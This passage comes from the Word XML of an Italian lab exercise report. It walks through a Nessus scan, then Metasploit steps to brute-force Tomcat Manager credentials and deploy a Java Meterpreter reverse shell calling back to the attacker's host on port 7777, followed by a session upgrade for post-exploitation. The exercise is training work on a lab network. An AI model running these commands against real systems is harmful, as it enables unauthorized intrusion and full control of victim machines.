        <w:t>Nessus è uno scanner di vulnerabilità: interroga il bersaglio e produce un elenco di problemi di sicurezza noti, ordinati per gravità. Per l'esercizio si esegue una scansione di base (Basic Network Scan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000031">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Passi eseguiti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000032">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="80" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avviare Nessus e collegarsi all'interfaccia web (https://localhost:8834).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000033">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="80" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creare una nuova scansione: New Scan → Basic Network Scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000034">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="80" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nel campo Targets inserire l'IP del bersaglio: 192.168.200.200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000035">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="80" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avviare la scansione e attendere il completamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La scansione ha prodotto 44 vulnerabilità. La schermata seguente mostra una delle vulnerabilità critiche rilevate, con la relativa descrizione e il codice CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3467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20"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 3 — Report di Nessus: dettaglio di una vulnerabilità critica tra le 44 rilevate sul target.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="16" w:space="0"/>
          <w:bottom w:val="none" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1499"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="eaf1fb"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000039">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1f6feb"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Cosa serve davvero per l'attacco</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000003A">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Il report Nessus fotografa lo stato di sicurezza del target ed è un'evidenza importante. Per l'esercizio, però, la strada scelta per ottenere l'accesso passa dal Tomcat Manager, l'applicazione di gestione di Tomcat protetta da username e password (spesso lasciati deboli o di default).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000003B">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4. Fase 3 — Exploitation con Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L'idea dell'attacco è semplice: Tomcat permette di caricare applicazioni web (file .war) tramite il Manager. Se conosciamo le credenziali del Manager, possiamo caricare un'applicazione malevola che, una volta eseguita, ci restituisce il controllo della macchina. Metasploit automatizza tutto questo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.1 — Trovare le credenziali del Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003F">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il modulo tomcat_mgr_login prova molte coppie utente/password comuni finché ne trova una valida:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3856"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000040">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msfconsole -q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000041">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>use auxiliary/scanner/http/tomcat_mgr_login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000042">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set RHOSTS 192.168.200.200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000043">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set RPORT 8080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000044">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000045">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.2 — Caricare il payload e aprire la sessione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000046">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Trovate le credenziali, si usa il modulo di upload. Il payload scelto è un Meterpreter Java (Tomcat gira su Java) che si ricollega a Kali. Nota il LPORT 7777: è la porta di ascolto richiesta dalla traccia.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3589"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000047">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>use exploit/multi/http/tomcat_mgr_upload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000048">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set RHOSTS 192.168.200.200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000049">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set RPORT 8080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000004A">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set HttpUsername &lt;utente_trovato&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000004B">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set HttpPassword &lt;password_trovata&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000004C">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set payload java/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000004D">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set LHOST 192.168.200.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000004E">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>set LPORT 7777</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000004F">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit carica l'applicazione, la esegue e apre la sessione Meterpreter. Con sysinfo e getuid si verifica di essere sul target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3467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21"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 4 — Sessione Meterpreter aperta con successo. sysinfo mostra il target (Windows, Meterpreter java/windows) e getuid l'account di servizio.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="16" w:space="0"/>
          <w:bottom w:val="none" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2082"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="eaf1fb"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000053">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1f6feb"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Un dettaglio importante: siamo SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000054">
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>getuid restituisce DESKTOP-9K1O4BT$ (l'account macchina). Questo significa che Tomcat gira con i privilegi più alti del sistema: non servirà nessuna escalation dei privilegi. È un punto che vale la pena evidenziare in un report reale, perché indica un impatto molto grave.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000055">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000056">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5. Fase 4 — Post-exploitation e raccolta evidenze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000057">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La sessione ottenuta è di tipo Java. Alcuni comandi Windows richiesti dalla traccia (come il controllo della virtualizzazione o lo screenshot) funzionano meglio su una sessione Meterpreter nativa. Per questo si effettua un upgrade della sessione:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1366"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000058">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>background</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000059">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sessions -u 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0000005A">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sessions -i 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000005B">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il comando sessions -u 1 crea automaticamente una nuova sessione nativa Windows (session 2), nella quale entriamo con sessions -i 2. Da qui raccogliamo le quattro evidenze richieste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000005D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Evidenza 1 — Macchina virtuale o fisica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005E">
      <w:pPr>
